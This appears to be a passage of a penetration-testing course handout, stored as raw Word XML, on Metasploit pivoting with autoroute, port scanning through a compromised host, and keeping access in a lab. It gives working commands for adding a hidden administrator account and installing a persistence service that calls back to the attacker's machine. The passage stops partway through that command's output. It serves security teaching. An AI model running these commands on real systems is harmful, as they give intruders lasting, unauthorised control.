        <w:t xml:space="preserve">Autoroute meterpreter is a script that allows an attacker to attack a second network or machine through a first machine he compromised. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FA8D9" w14:textId="2FFB0ED1" w:rsidR="00BE695B" w:rsidRPr="00BE695B" w:rsidRDefault="00BE695B" w:rsidP="00BE695B">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEB5C80" w14:textId="343E76C6" w:rsidR="008964C5" w:rsidRDefault="00371D00" w:rsidP="00954CBB">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using an enum module, find the IP of the MS2 machine on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF70F58" w14:textId="10573AD4" w:rsidR="00371D00" w:rsidRDefault="00954CBB" w:rsidP="00954CBB">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scan</w:t>
      </w:r>
      <w:r w:rsidR="00371D00">
        <w:t xml:space="preserve"> it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using tcp portscan module</w:t>
      </w:r>
      <w:r w:rsidR="00371D00">
        <w:t>. Did it work? Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767B1AD4" w14:textId="4030C221" w:rsidR="00894845" w:rsidRDefault="007237EC" w:rsidP="007237EC">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use autoroute to scan the Metasploitable 2 machine</w:t>
      </w:r>
      <w:r w:rsidR="003540C2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4521B495" w14:textId="3A411BCA" w:rsidR="00371D00" w:rsidRDefault="00371D00" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  ANSWERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2E031" w14:textId="1492559E" w:rsidR="00E54E8D" w:rsidRDefault="00D7336C" w:rsidP="00F33553">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Scanning the Metasploitable 2 machine does not work from our Kali machine. Packets are blocked by a Firewall and any incoming or outgoing packet from or to the Metasploitable 2 machine is blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A4797F" w14:textId="263F366E" w:rsidR="00986C62" w:rsidRDefault="00986C62" w:rsidP="00F33553">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>One solution is to use the compromised Windows machine to scan this machine as it is in the same network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6217D215" w14:textId="3B980B54" w:rsidR="00D765CD" w:rsidRDefault="00D765CD" w:rsidP="00F33553">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52F7683C" wp14:editId="30BA5D21">
            <wp:extent cx="4287520" cy="3898900"/>
            <wp:effectExtent l="190500" t="190500" r="189230" b="1968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ands_on_firewall_schema.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87520" cy="3898900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="70000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE0C51F" w14:textId="1537D7D9" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="00F33553">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Let us first add a route to the </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> machine, which is our target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AC2400" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; run post/multi/manage/autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE0AEA" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B257099" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[!] SESSION may not be compatible with this module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465D8342" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Running module against METASPLOITABLE3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C81677A" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Searching for subnets to autoroute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6B6765" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Route added to subnet 192.168.22.0/255.255.255.0 from host's routing table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A70BF" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08742E2D" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Backgrounding session 16...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1C1F34" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(windows/local/ms16_014_wmi_recv_notif) &gt; route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE60A33" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D220731" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IPv4 Active Routing Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7AB346" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>=========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C616A" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4272094F" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Subnet             Netmask            Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDBE176" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ------             -------            -------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0E5D88" w14:textId="4875DE13" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   192.168.22.0       255.255.255.0      Session 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCF5D6C" w14:textId="2E00827D" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] There are currently no IPv6 routes defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EDD208" w14:textId="77777777" w:rsidR="00FE0847" w:rsidRDefault="00FE0847" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649ACCA0" w14:textId="1D041D89" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Then, using the TCP portscan module, we can scan our target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74164835" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf exploit(windows/local/ms16_014_wmi_recv_notif) &gt; use auxiliary/scanner/portscan/tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD15A3" w14:textId="7E1ADBD7" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf auxiliary(scanner/portscan/tcp) &gt; set RHOSTS </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9D288B" w14:textId="6B44E2C2" w:rsidR="0041704F" w:rsidRDefault="00AD21B3" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RHOSTS =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E294265" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf auxiliary(scanner/portscan/tcp) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE51E19" w14:textId="77777777" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C04CDE" w14:textId="2ED8370F" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:        - </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:21 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6351CBCB" w14:textId="142901FD" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:        - </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:23 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54042135" w14:textId="0D529A65" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:        - </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:22 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E183E3" w14:textId="247C1687" w:rsidR="0041704F" w:rsidRDefault="0041704F" w:rsidP="0041704F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:        - </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:25 - TCP OPEN</w:t>
      </w:r>
      <w:r w:rsidR="00AD21B3">
        <w:t>^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CFD570" w14:textId="30FF7345" w:rsidR="00AD21B3" w:rsidRDefault="00AD21B3" w:rsidP="005255FC">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>SKIPPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783AE9A7" w14:textId="77777777" w:rsidR="00EB6EB4" w:rsidRDefault="00EB6EB4" w:rsidP="008F0D8A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F5E938" w14:textId="4B6B8E32" w:rsidR="008F0D8A" w:rsidRDefault="008F0D8A" w:rsidP="008F0D8A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>When your setting THREAD options, keep this guidelines from the Metasploit documentation in mind:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AF5B17" w14:textId="77777777" w:rsidR="008F0D8A" w:rsidRDefault="008F0D8A" w:rsidP="008F0D8A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Keep the THREADS value under 16 on native Win32 systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7697599C" w14:textId="77777777" w:rsidR="008F0D8A" w:rsidRDefault="008F0D8A" w:rsidP="008F0D8A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Keep THREADS under 200 when running MSF under Cygwin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3D23E" w14:textId="1CAEBD0D" w:rsidR="008F0D8A" w:rsidRDefault="008F0D8A" w:rsidP="008F0D8A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On Unix-like operating systems, THREADS can be set as high as 256.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED3E90D" w14:textId="6061052A" w:rsidR="006818B1" w:rsidRDefault="00A14E5A" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Maintaining access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050FFE31" w14:textId="030555A5" w:rsidR="00AF43CD" w:rsidRDefault="00AF43CD" w:rsidP="00AF43CD">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once an attacker managed to get access to a system, sometimes with hard work, he wants to have an easier access in the future in case the machine </w:t>
      </w:r>
      <w:r w:rsidR="002D61AF">
        <w:t xml:space="preserve">reboots, </w:t>
      </w:r>
      <w:r w:rsidR="002D61AF">
        <w:lastRenderedPageBreak/>
        <w:t>crashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or simply to come back later.</w:t>
      </w:r>
      <w:r w:rsidR="00F22811">
        <w:t xml:space="preserve"> Many way</w:t>
      </w:r>
      <w:r w:rsidR="00EB6EB4">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F22811">
        <w:t xml:space="preserve"> exist to do so, such as backdoors,</w:t>
      </w:r>
      <w:r w:rsidR="0063719C">
        <w:t xml:space="preserve"> Trojan or</w:t>
      </w:r>
      <w:r w:rsidR="00F22811">
        <w:t xml:space="preserve"> rootkits…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40A89C" w14:textId="5855A96D" w:rsidR="004711B2" w:rsidRDefault="004711B2" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidR="00220EB1">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D6DE2" w14:textId="0E7F225E" w:rsidR="00F229B1" w:rsidRDefault="0098056B" w:rsidP="00340DB5">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A simple but not so discrete way to maintain access is to add a user to the system. Here, </w:t>
      </w:r>
      <w:r w:rsidR="00662640">
        <w:t>we will</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> add a “h4cker” user with administrative rights on the system. To do so, we already have a Meterpreter session with NT AUTHORITY\SYSTEM privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480C72E7" w14:textId="30178577" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00340DB5">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Three steps are required:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1167E0D4" w14:textId="29A30EC9" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Getting a standard shell on the Windows machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BACC678" w14:textId="77777777" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E469AE5" w14:textId="77777777" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Process 4012 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B130F5" w14:textId="77777777" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Channel 1 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B02B41" w14:textId="77777777" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft Windows [Version 6.1.7601]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66782704" w14:textId="77777777" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Copyright (c) 2009 Microsoft Corporation.  All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7DAC75" w14:textId="77777777" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59EFC251" w14:textId="324DBC7A" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\ManageEngine\DesktopCentral_Server\bin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE49EBA" w14:textId="1229B418" w:rsidR="0098056B" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Adding the “h4cker” user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77983CEC" w14:textId="77777777" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\ManageEngine\DesktopCentral_Server\bin&gt;net user h4cker h4cker /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26661722" w14:textId="77777777" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>net user h4cker h4cker /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C72E73" w14:textId="35922E52" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The command completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EEB716" w14:textId="2E126828" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Giving this user administrative privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0A0B7" w14:textId="77777777" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\ManageEngine\DesktopCentral_Server\bin&gt;net localgroup administrators h4cker /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E12778D" w14:textId="413ED7CA" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>net localgroup administrators h4cker /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1332A04C" w14:textId="35814BCB" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The command completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CB81C3" w14:textId="77777777" w:rsidR="00662640" w:rsidRDefault="00662640" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C327D07" w14:textId="59C28094" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70197279" wp14:editId="6D2AEB0E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3496310" cy="2418715"/>
            <wp:effectExtent l="19050" t="19050" r="27940" b="196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user-ms3.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96310" cy="241871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t>If we try to log on the Windows machine, a new “h4cker” user is now available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F4364" w14:textId="2BC3A888" w:rsidR="00F229B1" w:rsidRDefault="00F229B1" w:rsidP="00F229B1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE7208E" w14:textId="5E1E51BC" w:rsidR="004711B2" w:rsidRDefault="00A14E5A" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Persistent</w:t>
      </w:r>
      <w:r w:rsidR="004711B2">
        <w:t xml:space="preserve"> backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B485D9A" w14:textId="1BFE6261" w:rsidR="006818B1" w:rsidRDefault="00E41E1D" w:rsidP="006818B1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Let us now add a persistent backdoor to our compromised Windows machine.</w:t>
      </w:r>
      <w:r w:rsidR="00FB2023">
        <w:t xml:space="preserve"> By using the persistence post module, we will install a service, starting </w:t>
      </w:r>
      <w:r w:rsidR="00241837">
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="00FB2023">
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r w:rsidR="00662640">
        <w:t>login. This service</w:t>
      </w:r>
      <w:r w:rsidR="00A15556">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB2023">
        <w:t>will try to connect back to our Meterpreter session every 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4931B077" w14:textId="71809738" w:rsidR="00620034" w:rsidRDefault="00620034" w:rsidP="00620034">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">          DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDEE01E" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; run persistence -X -i 5 -p 1338 -r 192.168.21.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A48A46E" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD8FF61" w14:textId="77777777" w:rsidR="00241837" w:rsidRDefault="00241837" w:rsidP="00241837">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.</w:t>
      </w:r>
